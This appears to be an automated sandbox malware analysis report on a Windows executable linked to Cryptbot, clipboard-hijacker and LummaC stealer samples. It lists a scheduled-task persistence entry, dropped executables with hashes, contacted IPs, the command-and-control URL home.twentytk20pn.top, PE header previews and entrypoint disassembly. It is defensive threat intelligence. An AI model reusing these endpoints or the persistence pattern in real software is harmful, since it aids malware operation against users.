Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.19.206, 64.233.164.84, 20.189.173.22, 13.107.246.63, 20.109.210.53, 184.28.90.27, 20.231.128.66, 13.89.179.8
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, self.events.data.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, clientservices.googleapis.com, time.windows.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:05:10	API Interceptor	2116277x Sleep call for process: SwJD3kiOwV.exe modified
04:06:59	API Interceptor	1x Sleep call for process: WerFault.exe modified
04:07:04	API Interceptor	7931410x Sleep call for process: service123.exe modified
10:06:29	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user~1\AppData\Local\Temp\/service123.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
98.85.100.80	8dw8GAvqmM.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	9nYVfFos77.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	L1SrJoDQvG.exe	Get hash	malicious	Unknown	Browse
	ovQrwYAhbq.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	Ry6ot1YULB.exe	Get hash	malicious	Unknown	Browse
	Cc8zEnIDB2.exe	Get hash	malicious	Unknown	Browse
	wlEp68Few5.exe	Get hash	malicious	Unknown	Browse
	Sh2uIqqKqc.exe	Get hash	malicious	Cryptbot	Browse
	rJvOqHxkuI.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse
239.255.255.250	8dw8GAvqmM.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	UYJ0oreVew.exe	Get hash	malicious	Unknown	Browse
	9nYVfFos77.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	L1SrJoDQvG.exe	Get hash	malicious	Unknown	Browse
	ovQrwYAhbq.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	Sh2uIqqKqc.exe	Get hash	malicious	Cryptbot	Browse
	rJvOqHxkuI.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	https://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0Z	Get hash	malicious	Unknown	Browse
	pM3fQBuTLy.exe	Get hash	malicious	Vidar	Browse
	NWKk493xTy.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
194.87.47.113	8dw8GAvqmM.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
	UYJ0oreVew.exe	Get hash	malicious	Unknown	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=68W1mYOnWEW1Ikcv1734594381
	L1SrJoDQvG.exe	Get hash	malicious	Unknown	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=JCYb9GDBDJ3Tpu2L1734594015
	Ry6ot1YULB.exe	Get hash	malicious	Unknown	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
	Cc8zEnIDB2.exe	Get hash	malicious	Unknown	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
	wlEp68Few5.exe	Get hash	malicious	Unknown	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
	rJvOqHxkuI.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
	NWKk493xTy.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
	88S3zQTYpl.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
twentytk20pn.top	8dw8GAvqmM.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	194.87.47.113
	UYJ0oreVew.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	L1SrJoDQvG.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	Ry6ot1YULB.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	Cc8zEnIDB2.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	wlEp68Few5.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	rJvOqHxkuI.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	194.87.47.113
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	194.87.47.113
	NWKk493xTy.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	194.87.47.113
	88S3zQTYpl.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	194.87.47.113
httpbin.org	8dw8GAvqmM.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	UYJ0oreVew.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	9nYVfFos77.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	L1SrJoDQvG.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	ovQrwYAhbq.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	Ry6ot1YULB.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	Cc8zEnIDB2.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	wlEp68Few5.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	Sh2uIqqKqc.exe	Get hash	malicious	Cryptbot	Browse	98.85.100.80
	rJvOqHxkuI.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
home.twentytk20pn.top	8dw8GAvqmM.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	194.87.47.113
	UYJ0oreVew.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	L1SrJoDQvG.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	Ry6ot1YULB.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	Cc8zEnIDB2.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	wlEp68Few5.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	rJvOqHxkuI.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	194.87.47.113
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	194.87.47.113
	NWKk493xTy.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	194.87.47.113
	88S3zQTYpl.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	194.87.47.113

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TWC-11351-NORTHEASTUS	8dw8GAvqmM.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	9nYVfFos77.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	L1SrJoDQvG.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	ovQrwYAhbq.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	Ry6ot1YULB.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	Cc8zEnIDB2.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	wlEp68Few5.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	Sh2uIqqKqc.exe	Get hash	malicious	Cryptbot	Browse	98.85.100.80
	rJvOqHxkuI.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	98.85.100.80
ASBAXETNRU	8dw8GAvqmM.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	194.87.47.113
	UYJ0oreVew.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	L1SrJoDQvG.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	Ry6ot1YULB.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	Cc8zEnIDB2.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	wlEp68Few5.exe	Get hash	malicious	Unknown	Browse	194.87.47.113
	rJvOqHxkuI.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	194.87.47.113
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	194.87.47.113
	NWKk493xTy.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	194.87.47.113
	88S3zQTYpl.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	194.87.47.113

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\ehoYPkfWhVokJMBQaExv.dll	8dw8GAvqmM.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	rJvOqHxkuI.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	NWKk493xTy.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	88S3zQTYpl.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	NVkyG9HAeY.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	aweqG2ssAY.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	EnoSY3z6MP.exe	Get hash	malicious	Cryptbot	Browse
	vH7JfdNi3c.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse
	random.exe.7.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SwJD3kiOwV.exe_46488af911677c9affb27f13a16d23e8aaa82ce_2c4ab7d8_0f0f28b5-d9e5-4c1f-9582-48889b5c13b7\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.114462519318718
Encrypted:	false
SSDEEP:	192:djxs4Rq0BU/Iju0ZrPMttMydzuiFkZ24IO8KP:Rq4RxBU/Ij/WzuiFkY4IO8K
MD5:	BEDE8026FEEB67D8D145113F193D074A
SHA1:	890F1FFE9D8EB7C1A3B3C589ADAC7F838E2AE8D3
SHA-256:	450F16AD74D9353BE5817EBE0989884A5EC97A79AC7654EA784FF64B36BF874E
SHA-512:	B6CA6BAA6801616B24B511679D338383C5A5E77722A86871E199BBF7CE819D13C543566D13EB17616ABDA3862F459D3DBD3328C1A79B97DC76712D4330646F9B
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.7.2.7.8.9.1.4.0.6.8.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.7.2.7.9.0.7.5.0.0.6.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.0.f.2.8.b.5.-.d.9.e.5.-.4.c.1.f.-.9.5.8.2.-.4.8.8.8.9.b.5.c.1.3.b.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.e.1.a.4.3.5.2.-.d.9.f.5.-.4.c.d.0.-.a.1.f.4.-.2.0.9.a.d.7.6.6.a.5.d.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.w.J.D.3.k.i.O.w.V...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.2.0.-.0.0.0.1.-.0.0.1.4.-.1.f.e.a.-.1.b.3.5.e.a.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.b.2.0.c.1.0.6.7.9.c.d.f.6.3.a.4.d.d.1.6.4.a.4.3.6.8.a.8.0.b.4.0.0.0.0.f.f.f.f.!.0.0.0.0.5.2.f.d.8.3.1.7.6.1.f.d.d.d.9.5.7.5.5.e.8.9.f.a.4.2.8.9.e.f.4.d.f.1.e.b.2.9.1.5.!.S.w.J.D.3.k.i.O.w.V...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FD4.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Dec 19 09:06:30 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	274318
Entropy (8bit):	1.4669051947051515
Encrypted:	false
SSDEEP:	1536:GDJDK7Hg2nQwbfnVOkd/ZaG3PmJNwLJbPNkl:GDMA2nhbfVOkd/IG3PmJNwNbPKl
MD5:	7773DF8F5E08B636C60BE556951734B3
SHA1:	EC1E49989E5E8DDF23D9FC09BACB36E0BBB81BB5
SHA-256:	D9082B2750BA7663569C0B2ED63CE9306BDB5312D7935E609596F173F047BAD0
SHA-512:	F0159E26D06B9769FF0415B3D5540EFC10D0CBE2671E46AC686A152DFDD8B99EE7B2A8BC0F187A437662549066290EEA48490D9FA0CC1603DCCDCFBCC271CD8A
Malicious:	false
Preview:	MDMP..a..... .........cg........................................x,.....................`.......8...........T............D..............D-..........0/..............................................................................eJ......./......GenuineIntel............T....... ...}.cg....2........................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9498.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8366
Entropy (8bit):	3.701766026698599
Encrypted:	false
SSDEEP:	192:R6l7wVeJlC6Gv6YNJSUxogmfSbzprQk89bhXsfrLm:R6lXJQ6Gv6YDSUxogmfSbohcfm
MD5:	AC255199303EBF82668628BC87D5A1EF
SHA1:	AB3B06E7F2D616CF6F78E6BA358CA03AE248BB9B
SHA-256:	40DB28879A9FA8EFC996E68B0493D73BE4A779E2D773F54D49E0180021678A20
SHA-512:	8AC0CD72AAA777F4BCD6F7103773691730AEE8B1527697509A420ABCED066071E20479C3250DDD10CCAD69CA71563C67CCF709D42443F125DAE6D57D6F57D46B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9516.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4594
Entropy (8bit):	4.476287271037504
Encrypted:	false
SSDEEP:	48:cvIwWl8zsQJg77aI9R+WpW8VYk/Ym8M4Jb5FC+q8weIoJpikzMydd:uIjfWI7T/7VcJiyIo9zMydd
MD5:	CF37773FFFFFFAB6153AA941ACFB312B
SHA1:	D5CA312C6A15CE790A50BBBC85B404152D084484
SHA-256:	9113AD208816D7F3D681352B38F7E081BD1FCB121B2362AE35127C87BD7EF649
SHA-512:	EE42E4FB229A51592C2AC65F84CB35CDFD56500B011A85B8FE24276DAABA64231D169FA407DF318058B139BAD165F383AD0A62A39E4D3C5EBBD3C9BEF2E9B05F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="637929" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Temp\ehoYPkfWhVokJMBQaExv.dll

Download File

Process:	C:\Users\user\Desktop\SwJD3kiOwV.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	modified
Size (bytes):	315803136
Entropy (8bit):	0.054355404265247424
Encrypted:	false
SSDEEP:	24576:mV6EnBO/3Tjg05rfKYlxxQN3QAJhUCwW5nfnI0fIgVHt5JlBVE:dvZAfWW5ntf1VN5JlBVE
MD5:	633D2EA87075AF056EA448199D1B6B51
SHA1:	ACBA5B51C8CE89F7461E8E78785028E090133E71
SHA-256:	0259D4106A6068D299FADD3FC9B7AA2116BBDF70DDA1EAED55C8CA3826C75999
SHA-512:	6EE5B2A17B3901388B7B1C34D04A722214C4452D93A11111AF167B99FCC6AE84A07FC0126F63B5F8F439D538BC33174FF7C6FDF94589714B56360BAA82A3EF0D
Malicious:	false
Joe Sandbox View:	Filename: 8dw8GAvqmM.exe, Detection: malicious, Browse Filename: rJvOqHxkuI.exe, Detection: malicious, Browse Filename: NWKk493xTy.exe, Detection: malicious, Browse Filename: 88S3zQTYpl.exe, Detection: malicious, Browse Filename: NVkyG9HAeY.exe, Detection: malicious, Browse Filename: aweqG2ssAY.exe, Detection: malicious, Browse Filename: EnoSY3z6MP.exe, Detection: malicious, Browse Filename: vH7JfdNi3c.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: random.exe.7.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...bT`g...........#...(..........................0m.........................@............@... .........................`.......................................Hz...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..Hz.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\Desktop\SwJD3kiOwV.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.0023405885373275906
Encrypted:	false
SSDEEP:
MD5:	110FE44D33E426703CD712E879D34CBC
SHA1:	F7E396874328BA5813FE846DF4DB08A0AE8C7827
SHA-256:	3887BC25C5F53AA834C4277D5FF6DAC4F0B5B04C86C341095A5BF46F9EA150A4
SHA-512:	14C40AAD78EA18D08E3B5792EA55B6A7724907AA41D541DCBE960329C875426BA45C9C43607C67CFC8E87F14CD2EC004942E50EF5D3CE84E71EC3427DC4DD679
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...XT`g...............(.v........................@.......................... .......W....@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4166976362982595
Encrypted:	false
SSDEEP:
MD5:	3888E8D474319769F1AF3B16631235DD
SHA1:	BEEF96B8652632DCA53A4947BCD32EAE7FE85206
SHA-256:	76BF4D601CEC0E55306E86BDDA68A829F3A505B98C7BFAE815610DBD0A9A9049
SHA-512:	9D3F18DEB739B29012562C0E3ED079E153F9746730A17B827559D40904F624881230523E4E4BBE85A804AA14F70DFFE0B8594132C8E01AFABE1B4511579D0A20
Malicious:	false
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.!J.Q...............................................................................................................................................................................................................................................................................................................................................!6~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.988447497115844
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SwJD3kiOwV.exe
File size:	4'453'376 bytes
MD5:	cbb6759a3eb582b7a659ebe3bee1ddab
SHA1:	52fd831761fddd95755e89fa4289ef4df1eb2915
SHA256:	6475a7d9465487089c2e20ed7c60efa9cb27a6fa86bbd20454152b773b7021ff
SHA512:	16bd9f69c6ea8ef059e0ac6f4e40d0c5b445f6e14edf1d850f10ad0f3d500d2ba8874f76022ec15b51f70e308cd8121b214587869f6a2b96ee93fbcd75148b55
SSDEEP:	98304:rPWXfn2o5jaFdiLqHZmaU4S2gnvUf1YDsF8M3/q9gpYZVF6TV:TWv2ola/3EzAgntD3sHp3
TLSH:	59263312AD5B2530D1D32AFB392D16A726FE63456DE50E1D93A4C7A8D83233F424EB34
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...........PD...@..................................7D...@... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xf5e000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F4970E6972Ah
psrld mm0, qword ptr [ebx+00h]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F4970E6B725h
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], ch
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x61905f	0x73	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x618000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb5c5f0	0x10	wpxibirw
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xb5c5a0	0x18	wpxibirw
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
